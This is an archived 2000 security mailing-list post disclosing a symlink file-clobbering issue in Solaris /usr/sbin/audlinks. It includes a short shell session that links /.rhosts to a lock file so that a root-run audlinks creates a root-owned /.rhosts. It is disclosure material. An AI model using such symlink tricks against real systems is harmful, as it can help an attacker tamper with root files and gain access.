|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: (no subject)
From:
SECURITYFOCUS.COMDate: Thu Dec 28 2000 - 16:34:50 CST
- Next message: ___cliff rayman___: "Re: Remote vulnerability in Ikonboard upto version 2.1.7b"
- Previous message: Gijs Hollestelle: "Remote vulnerability in Ikonboard upto version 2.1.7b"
- Maybe reply: SECURITYFOCUS.COM: "(no subject)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
/usr/sbin/audlinks has the following behavior:
$ id
uid=100(optyx) gid=1(other)
$ mkdir -p /tmp/b/dev
$ ln -s /.rhosts /tmp/b/dev/.devfsadm_dev.lock
$ su root
Password:
# /usr/sbin/audlinks -r /tmp/b
# ls -l /.rhosts
-rw-r--r-- 1 root other 4 Dec 28 14:28 /.rhosts
truss output snippet:
open("/dev/.devfsadm_dev.lock", O_RDWR|O_CREAT, 0644) = 4
this is similar to the /usr/sbin/patchadd file clobbering "vulnerability" (not really a vulnerability as a user has to set the link then root has to run the program, but)
-Optyx, Uberhax0r Communications
http://www.uberhax0r.net
- Next message: ___cliff rayman___: "Re: Remote vulnerability in Ikonboard upto version 2.1.7b"
- Previous message: Gijs Hollestelle: "Remote vulnerability in Ikonboard upto version 2.1.7b"
- Maybe reply: SECURITYFOCUS.COM: "(no subject)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]